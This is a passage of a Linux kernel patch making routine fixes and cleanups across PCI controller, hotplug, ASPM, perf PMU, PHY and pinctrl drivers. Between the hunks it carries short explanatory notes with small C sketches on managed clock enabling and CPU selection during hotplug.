+ 	reset_control_assert(res->ext_reset);
+ 	reset_control_assert(res->phy_reset);
+ 
+-	writel(1, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(1, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	regulator_bulk_disable(ARRAY_SIZE(res->supplies), res->supplies);
+ }
+@@ -420,9 +432,9 @@ static int qcom_pcie_post_init_2_1_0(struct qcom_pcie *pcie)
+ 	int ret;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	ret = clk_bulk_prepare_enable(ARRAY_SIZE(res->clks), res->clks);
+ 	if (ret)
+@@ -433,37 +445,37 @@ static int qcom_pcie_post_init_2_1_0(struct qcom_pcie *pcie)
+ 		writel(PCS_DEEMPH_TX_DEEMPH_GEN1(24) |
+ 			       PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(24) |
+ 			       PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(34),
+-		       pcie->parf + PCIE20_PARF_PCS_DEEMPH);
++		       pcie->parf + PARF_PCS_DEEMPH);
+ 		writel(PCS_SWING_TX_SWING_FULL(120) |
+ 			       PCS_SWING_TX_SWING_LOW(120),
+-		       pcie->parf + PCIE20_PARF_PCS_SWING);
+-		writel(PHY_RX0_EQ(4), pcie->parf + PCIE20_PARF_CONFIG_BITS);
++		       pcie->parf + PARF_PCS_SWING);
++		writel(PHY_RX0_EQ(4), pcie->parf + PARF_CONFIG_BITS);
+ 	}
+ 
+ 	if (of_device_is_compatible(node, "qcom,pcie-ipq8064")) {
+ 		/* set TX termination offset */
+-		val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++		val = readl(pcie->parf + PARF_PHY_CTRL);
+ 		val &= ~PHY_CTRL_PHY_TX0_TERM_OFFSET_MASK;
+ 		val |= PHY_CTRL_PHY_TX0_TERM_OFFSET(7);
+-		writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++		writel(val, pcie->parf + PARF_PHY_CTRL);
+ 	}
+ 
+ 	/* enable external reference clock */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_REFCLK);
++	val = readl(pcie->parf + PARF_PHY_REFCLK);
+ 	/* USE_PAD is required only for ipq806x */
+ 	if (!of_device_is_compatible(node, "qcom,pcie-apq8064"))
+ 		val &= ~PHY_REFCLK_USE_PAD;
+ 	val |= PHY_REFCLK_SSP_EN;
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_REFCLK);
++	writel(val, pcie->parf + PARF_PHY_REFCLK);
+ 
+ 	/* wait for clock acquisition */
+ 	usleep_range(1000, 1500);
+ 
+ 	/* Set the Max TLP size to 2K, instead of using default of 4K */
+ 	writel(CFG_REMOTE_RD_REQ_BRIDGE_SIZE_2K,
+-	       pci->dbi_base + PCIE20_AXI_MSTR_RESP_COMP_CTRL0);
++	       pci->dbi_base + AXI_MSTR_RESP_COMP_CTRL0);
+ 	writel(CFG_BRIDGE_SB_INIT,
+-	       pci->dbi_base + PCIE20_AXI_MSTR_RESP_COMP_CTRL1);
++	       pci->dbi_base + AXI_MSTR_RESP_COMP_CTRL1);
+ 
+ 	return 0;
+ }
+@@ -571,13 +583,13 @@ err_res:
+ static int qcom_pcie_post_init_1_0_0(struct qcom_pcie *pcie)
+ {
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		u32 val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
++		u32 val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT);
+ 
+ 		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
++		writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT);
+ 	}
+ 
+ 	return 0;
+@@ -588,9 +600,9 @@ static void qcom_pcie_2_3_2_ltssm_enable(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable link training */
+-	val = readl(pcie->parf + PCIE20_PARF_LTSSM);
++	val = readl(pcie->parf + PARF_LTSSM);
+ 	val |= BIT(8);
+-	writel(val, pcie->parf + PCIE20_PARF_LTSSM);
++	writel(val, pcie->parf + PARF_LTSSM);
+ }
+ 
+ static int qcom_pcie_get_resources_2_3_2(struct qcom_pcie *pcie)
+@@ -695,25 +707,25 @@ static int qcom_pcie_post_init_2_3_2(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ }
+@@ -974,25 +986,25 @@ static int qcom_pcie_post_init_2_4_0(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ }
+@@ -1137,22 +1149,24 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE);
++		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE_2_3_3);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	writel(MST_WAKEUP_EN | SLV_WAKEUP_EN | MSTR_ACLK_CGC_DIS
+ 		| SLV_ACLK_CGC_DIS | CORE_CLK_CGC_DIS |
+ 		AUX_PWR_DET | L23_CLK_RMV_DIS | L1_CLK_RMV_DIS,
+-		pcie->parf + PCIE20_PARF_SYS_CTRL);
+-	writel(0, pcie->parf + PCIE20_PARF_Q2A_FLUSH);
++		pcie->parf + PARF_SYS_CTRL);
++	writel(0, pcie->parf + PARF_Q2A_FLUSH);
+ 
+ 	writel(PCI_COMMAND_MASTER, pci->dbi_base + PCI_COMMAND);
+-	writel(DBI_RO_WR_EN, pci->dbi_base + PCIE20_MISC_CONTROL_1_REG);
++
++	dw_pcie_dbi_ro_wr_en(pci);
++
+ 	writel(PCIE_CAP_SLOT_VAL, pci->dbi_base + offset + PCI_EXP_SLTCAP);
+ 
+ 	val = readl(pci->dbi_base + offset + PCI_EXP_LNKCAP);
+@@ -1252,33 +1266,33 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	usleep_range(1000, 1500);
+ 
+ 	/* configure PCIe to RC mode */
+-	writel(DEVICE_TYPE_RC, pcie->parf + PCIE20_PARF_DEVICE_TYPE);
++	writel(DEVICE_TYPE_RC, pcie->parf + PARF_DEVICE_TYPE);
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
++	val = readl(pcie->parf + PARF_SYS_CTRL);
+ 	val &= ~BIT(29);
+-	writel(val, pcie->parf + PCIE20_PARF_SYS_CTRL);
++	writel(val, pcie->parf + PARF_SYS_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	val = readl(pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	val |= BIT(4);
+-	writel(val, pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++	writel(val, pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 
+ 	/* Enable L1 and L1SS */
+-	val = readl(pcie->parf + PCIE20_PARF_PM_CTRL);
++	val = readl(pcie->parf + PARF_PM_CTRL);
+ 	val &= ~REQ_NOT_ENTR_L1;
+-	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
++	writel(val, pcie->parf + PARF_PM_CTRL);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 	val |= BIT(31);
+-	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+@@ -1366,17 +1380,17 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	int i;
+ 
+ 	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE);
++		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE);
+ 
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+-	writel(DEVICE_TYPE_RC, pcie->parf + PCIE20_PARF_DEVICE_TYPE);
++	writel(DEVICE_TYPE_RC, pcie->parf + PARF_DEVICE_TYPE);
+ 	writel(BYPASS | MSTR_AXI_CLK_EN | AHB_CLK_EN,
+-		pcie->parf + PCIE20_PARF_MHI_CLOCK_RESET_CTRL);
++		pcie->parf + PARF_MHI_CLOCK_RESET_CTRL);
+ 	writel(GEN3_RELATED_OFF_RXEQ_RGRDLESS_RXTS |
+ 		GEN3_RELATED_OFF_GEN3_ZRXDC_NONCOMPL,
+ 		pci->dbi_base + GEN3_RELATED_OFF);
+@@ -1384,11 +1398,12 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	writel(MST_WAKEUP_EN | SLV_WAKEUP_EN | MSTR_ACLK_CGC_DIS |
+ 		SLV_ACLK_CGC_DIS | CORE_CLK_CGC_DIS |
+ 		AUX_PWR_DET | L23_CLK_RMV_DIS | L1_CLK_RMV_DIS,
+-		pcie->parf + PCIE20_PARF_SYS_CTRL);
++		pcie->parf + PARF_SYS_CTRL);
+ 
+-	writel(0, pcie->parf + PCIE20_PARF_Q2A_FLUSH);
++	writel(0, pcie->parf + PARF_Q2A_FLUSH);
+ 
+ 	dw_pcie_dbi_ro_wr_en(pci);
++
+ 	writel(PCIE_CAP_SLOT_VAL, pci->dbi_base + offset + PCI_EXP_SLTCAP);
+ 
+ 	val = readl(pci->dbi_base + offset + PCI_EXP_LNKCAP);
+@@ -1398,8 +1413,10 @@ static int qcom_pcie_post_init_2_9_0(struct qcom_pcie *pcie)
+ 	writel(PCI_EXP_DEVCTL2_COMP_TMOUT_DIS, pci->dbi_base + offset +
+ 			PCI_EXP_DEVCTL2);
+ 
++	dw_pcie_dbi_ro_wr_dis(pci);
++
+ 	for (i = 0; i < 256; i++)
+-		writel(0, pcie->parf + PCIE20_PARF_BDF_TO_SID_TABLE_N + (4 * i));
++		writel(0, pcie->parf + PARF_BDF_TO_SID_TABLE_N + (4 * i));
+ 
+ 	return 0;
+ }
+@@ -1421,7 +1438,7 @@ static int qcom_pcie_config_sid_sm8250(struct qcom_pcie *pcie)
+ 		u32 smmu_sid;
+ 		u32 smmu_sid_len;
+ 	} *map;
+-	void __iomem *bdf_to_sid_base = pcie->parf + PCIE20_PARF_BDF_TO_SID_TABLE_N;
++	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
+ 	struct device *dev = pcie->pci->dev;
+ 	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
+ 	int i, nr_map, size = 0;
+diff --git a/drivers/pci/controller/pci-ftpci100.c b/drivers/pci/controller/pci-ftpci100.c
+index 0cfd9d5a497c9..f7e61e169d838 100644
+--- a/drivers/pci/controller/pci-ftpci100.c
++++ b/drivers/pci/controller/pci-ftpci100.c
+@@ -429,22 +429,12 @@ static int faraday_pci_probe(struct platform_device *pdev)
+ 	p->dev = dev;
+ 
+ 	/* Retrieve and enable optional clocks */
+-	clk = devm_clk_get(dev, "PCLK");
++	clk = devm_clk_get_enabled(dev, "PCLK");
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "could not prepare PCLK\n");
+-		return ret;
+-	}
+-	p->bus_clk = devm_clk_get(dev, "PCICLK");
++	p->bus_clk = devm_clk_get_enabled(dev, "PCICLK");
+ 	if (IS_ERR(p->bus_clk))
+ 		return PTR_ERR(p->bus_clk);
+-	ret = clk_prepare_enable(p->bus_clk);
+-	if (ret) {
+-		dev_err(dev, "could not prepare PCICLK\n");
+-		return ret;
+-	}
+ 
+ 	p->base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(p->base))
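
The ftpci100 conversion relies on devm_clk_get_enabled(), which merges clk_get with clk_prepare_enable and registers the matching disable/put on the device's managed-resource list, so early error returns no longer need manual cleanup. A toy sketch of that acquire-and-register-release idea; the devres table here is invented purely for illustration:

    #include <stdio.h>

    /* Tiny devres-style stack: acquisitions register a release callback
     * that runs automatically, in reverse order, on teardown. */
    typedef void (*release_fn)(const char *);

    static struct { release_fn fn; const char *arg; } devres[8];
    static int n_devres;

    static void clk_disable(const char *name) { printf("disable %s\n", name); }

    /* Analogue of devm_clk_get_enabled(): enable now, queue the disable. */
    static int get_enabled_clk(const char *name)
    {
            printf("enable %s\n", name);
            devres[n_devres].fn = clk_disable;
            devres[n_devres++].arg = name;
            return 0;
    }

    static void device_teardown(void)
    {
            while (n_devres--)
                    devres[n_devres].fn(devres[n_devres].arg);
    }

    int main(void)
    {
            if (get_enabled_clk("PCLK") || get_enabled_clk("PCICLK"))
                    return 1;
            /* ...probe body: any early return no longer needs manual
             * disables; teardown handles both clocks. */
            device_teardown();      /* disables PCICLK, then PCLK */
            return 0;
    }
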
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index 769eedeb8802a..d1eb17e3f1474 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -872,7 +872,8 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 		if (!list_empty(&child->devices)) {
+ 			dev = list_first_entry(&child->devices,
+ 					       struct pci_dev, bus_list);
+-			if (pci_reset_bus(dev))
++			ret = pci_reset_bus(dev);
++			if (ret)
+ 				pci_warn(dev, "can't reset device: %d\n", ret);
+ 
+ 			break;
+@@ -979,6 +980,13 @@ static void vmd_remove(struct pci_dev *dev)
+ 	ida_simple_remove(&vmd_instance_ida, vmd->instance);
+ }
+ 
++static void vmd_shutdown(struct pci_dev *dev)
++{
++	struct vmd_dev *vmd = pci_get_drvdata(dev);
++
++	vmd_remove_irq_domain(vmd);
++}
++
+ #ifdef CONFIG_PM_SLEEP
+ static int vmd_suspend(struct device *dev)
+ {
+@@ -1056,6 +1064,7 @@ static struct pci_driver vmd_drv = {
+ 	.id_table	= vmd_ids,
+ 	.probe		= vmd_probe,
+ 	.remove		= vmd_remove,
++	.shutdown	= vmd_shutdown,
+ 	.driver		= {
+ 		.pm	= &vmd_dev_pm_ops,
+ 	},
+diff --git a/drivers/pci/endpoint/functions/Kconfig b/drivers/pci/endpoint/functions/Kconfig
+index 295a033ee9a27..8efb6a869e7ce 100644
+--- a/drivers/pci/endpoint/functions/Kconfig
++++ b/drivers/pci/endpoint/functions/Kconfig
+@@ -27,13 +27,13 @@ config PCI_EPF_NTB
+ 	  If in doubt, say "N" to disable Endpoint NTB driver.
+ 
+ config PCI_EPF_VNTB
+-        tristate "PCI Endpoint NTB driver"
+-        depends on PCI_ENDPOINT
+-        depends on NTB
+-        select CONFIGFS_FS
+-        help
+-          Select this configuration option to enable the Non-Transparent
+-          Bridge (NTB) driver for PCIe Endpoint. NTB driver implements NTB
+-          between PCI Root Port and PCIe Endpoint.
++	tristate "PCI Endpoint Virtual NTB driver"
++	depends on PCI_ENDPOINT
++	depends on NTB
++	select CONFIGFS_FS
++	help
++	  Select this configuration option to enable the Non-Transparent
++	  Bridge (NTB) driver for PCIe Endpoint. NTB driver implements NTB
++	  between PCI Root Port and PCIe Endpoint.
+ 
+-          If in doubt, say "N" to disable Endpoint NTB driver.
++	  If in doubt, say "N" to disable Endpoint NTB driver.
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index 55283d2379a6a..f0c4d0f77453a 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -112,7 +112,7 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 				      size_t len, dma_addr_t dma_remote,
+ 				      enum dma_transfer_direction dir)
+ {
+-	struct dma_chan *chan = (dir == DMA_DEV_TO_MEM) ?
++	struct dma_chan *chan = (dir == DMA_MEM_TO_DEV) ?
+ 				 epf_test->dma_chan_tx : epf_test->dma_chan_rx;
+ 	dma_addr_t dma_local = (dir == DMA_MEM_TO_DEV) ? dma_src : dma_dst;
+ 	enum dma_ctrl_flags flags = DMA_CTRL_ACK | DMA_PREP_INTERRUPT;
+diff --git a/drivers/pci/hotplug/pciehp_ctrl.c b/drivers/pci/hotplug/pciehp_ctrl.c
+index 529c348084401..32baba1b7f131 100644
+--- a/drivers/pci/hotplug/pciehp_ctrl.c
++++ b/drivers/pci/hotplug/pciehp_ctrl.c
+@@ -256,6 +256,14 @@ void pciehp_handle_presence_or_link_change(struct controller *ctrl, u32 events)
+ 	present = pciehp_card_present(ctrl);
+ 	link_active = pciehp_check_link_active(ctrl);
+ 	if (present <= 0 && link_active <= 0) {
++		if (ctrl->state == BLINKINGON_STATE) {
++			ctrl->state = OFF_STATE;
++			cancel_delayed_work(&ctrl->button_work);
++			pciehp_set_indicators(ctrl, PCI_EXP_SLTCTL_PWR_IND_OFF,
++					      INDICATOR_NOOP);
++			ctrl_info(ctrl, "Slot(%s): Card not present\n",
++				  slot_name(ctrl));
++		}
+ 		mutex_unlock(&ctrl->state_lock);
+ 		return;
+ 	}
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 4b4184563a927..74b8183c305df 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1010,21 +1010,24 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 
+ 	down_read(&pci_bus_sem);
+ 	mutex_lock(&aspm_lock);
+-	/*
+-	 * All PCIe functions are in one slot, remove one function will remove
+-	 * the whole slot, so just wait until we are the last function left.
+-	 */
+-	if (!list_empty(&parent->subordinate->devices))
+-		goto out;
+ 
+ 	link = parent->link_state;
+ 	root = link->root;
+ 	parent_link = link->parent;
+ 
+-	/* All functions are removed, so just disable ASPM for the link */
++	/*
++	 * link->downstream is a pointer to the pci_dev of function 0.  If
++	 * we remove that function, the pci_dev is about to be deallocated,
++	 * so we can't use link->downstream again.  Free the link state to
++	 * avoid this.
++	 *
++	 * If we're removing a non-0 function, it's possible we could
++	 * retain the link state, but PCIe r6.0, sec 7.5.3.7, recommends
++	 * programming the same ASPM Control value for all functions of
++	 * multi-function devices, so disable ASPM for all of them.
++	 */
+ 	pcie_config_aspm_link(link, 0);
+ 	list_del(&link->sibling);
+-	/* Clock PM is for endpoint device */
+ 	free_link_state(link);
+ 
+ 	/* Recheck latencies and configure upstream links */
+@@ -1032,7 +1035,7 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 		pcie_update_aspm_capable(root);
+ 		pcie_config_aspm_path(parent_link);
+ 	}
+-out:
++
+ 	mutex_unlock(&aspm_lock);
+ 	up_read(&pci_bus_sem);
+ }
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index ff86075edca48..90008e24d1cc7 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1898,9 +1898,10 @@ static int arm_cmn_init_dtc(struct arm_cmn *cmn, struct arm_cmn_node *dn, int id
+ 	if (dtc->irq < 0)
+ 		return dtc->irq;
+ 
+-	writel_relaxed(0, dtc->base + CMN_DT_PMCR);
++	writel_relaxed(CMN_DT_DTC_CTL_DT_EN, dtc->base + CMN_DT_DTC_CTL);
++	writel_relaxed(CMN_DT_PMCR_PMU_EN | CMN_DT_PMCR_OVFL_INTR_EN, dtc->base + CMN_DT_PMCR);
++	writeq_relaxed(0, dtc->base + CMN_DT_PMCCNTR);
+ 	writel_relaxed(0x1ff, dtc->base + CMN_DT_PMOVSR_CLR);
+-	writel_relaxed(CMN_DT_PMCR_OVFL_INTR_EN, dtc->base + CMN_DT_PMCR);
+ 
+ 	return 0;
+ }
+@@ -1960,7 +1961,7 @@ static int arm_cmn_init_dtcs(struct arm_cmn *cmn)
+ 			dn->type = CMN_TYPE_CCLA;
+ 	}
+ 
+-	writel_relaxed(CMN_DT_DTC_CTL_DT_EN, cmn->dtc[0].base + CMN_DT_DTC_CTL);
++	arm_cmn_set_state(cmn, CMN_STATE_DISABLED);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index 071e63d9a9ac6..b61f1f9aba214 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -672,7 +672,7 @@ static int hisi_pcie_pmu_offline_cpu(unsigned int cpu, struct hlist_node *node)
+ 
+ 	pcie_pmu->on_cpu = -1;
+ 	/* Choose a new CPU from all online cpus. */
+-	target = cpumask_first(cpu_online_mask);
++	target = cpumask_any_but(cpu_online_mask, cpu);
+ 	if (target >= nr_cpu_ids) {
+ 		pci_err(pcie_pmu->pdev, "There is no CPU to set\n");
+ 		return 0;
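The cpumask change matters because this hotplug callback runs while cpu is on its way offline: cpumask_first(cpu_online_mask) can still return the dying CPU itself, while cpumask_any_but() skips it. A userspace sketch of the same selection over a plain bitmask (the helper is a simplified reimplementation, not the kernel cpumask API):

#include <assert.h>
#include <stdio.h>

#define NR_CPUS 8

/* Return the first set bit, skipping 'skip'; NR_CPUS means "none found". */
static int any_but(unsigned int mask, int skip)
{
	for (int cpu = 0; cpu < NR_CPUS; cpu++)
		if (cpu != skip && (mask & (1u << cpu)))
			return cpu;
	return NR_CPUS;
}

int main(void)
{
	/* CPU0 is still online but is the one going down: must not be chosen. */
	unsigned int online = 0x05;	/* CPUs 0 and 2 */

	assert(any_but(online, 0) == 2);
	assert(any_but(0x01, 0) == NR_CPUS);	/* no fallback CPU left */
	puts("migration target selection ok");
	return 0;
}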
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index ce14645a86ecb..4d5b4071d47d5 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -562,6 +562,7 @@ static void tegra_xusb_port_unregister(struct tegra_xusb_port *port)
+ 		usb_role_switch_unregister(port->usb_role_sw);
+ 		cancel_work_sync(&port->usb_phy_work);
+ 		usb_remove_phy(&port->usb_phy);
++		port->usb_phy.dev->driver = NULL;
+ 	}
+ 
+ 	if (port->ops->remove)
+@@ -669,6 +670,9 @@ static int tegra_xusb_setup_usb_role_switch(struct tegra_xusb_port *port)
+ 	port->dev.driver = devm_kzalloc(&port->dev,
+ 					sizeof(struct device_driver),
+ 					GFP_KERNEL);
++	if (!port->dev.driver)
++		return -ENOMEM;
++
+ 	port->dev.driver->owner	 = THIS_MODULE;
+ 
+ 	port->usb_role_sw = usb_role_switch_register(&port->dev,
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 0f1ab0829ffe6..fe8da3ccb0b5a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -376,10 +376,8 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ 	if (!pctldev)
+ 		return 0;
+ 
+-	gpiochip_add_pin_range(gc, pinctrl_dev_get_devname(pctldev), 0, 0,
+-			       gc->ngpio);
+-
+-	return 0;
++	return gpiochip_add_pin_range(gc, pinctrl_dev_get_devname(pctldev), 0, 0,
++				      gc->ngpio);
+ }
+ 
+ static const struct gpio_chip bcm2835_gpio_chip = {
+diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c
+index 5c4fd16e5b010..0d6b5fab2f7e4 100644
+--- a/drivers/pinctrl/intel/pinctrl-cherryview.c
++++ b/drivers/pinctrl/intel/pinctrl-cherryview.c
+@@ -947,11 +947,6 @@ static int chv_config_get(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		break;
+ 
+-	case PIN_CONFIG_DRIVE_OPEN_DRAIN:
+-		if (!(ctrl1 & CHV_PADCTRL1_ODEN))
+-			return -EINVAL;
+-		break;
+-
+ 	case PIN_CONFIG_BIAS_HIGH_IMPEDANCE: {
+ 		u32 cfg;
+ 
+@@ -961,6 +956,16 @@ static int chv_config_get(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			return -EINVAL;
+ 
+ 		break;
++
++	case PIN_CONFIG_DRIVE_PUSH_PULL:
++		if (ctrl1 & CHV_PADCTRL1_ODEN)
++			return -EINVAL;
++		break;
++
++	case PIN_CONFIG_DRIVE_OPEN_DRAIN:
++		if (!(ctrl1 & CHV_PADCTRL1_ODEN))
++			return -EINVAL;
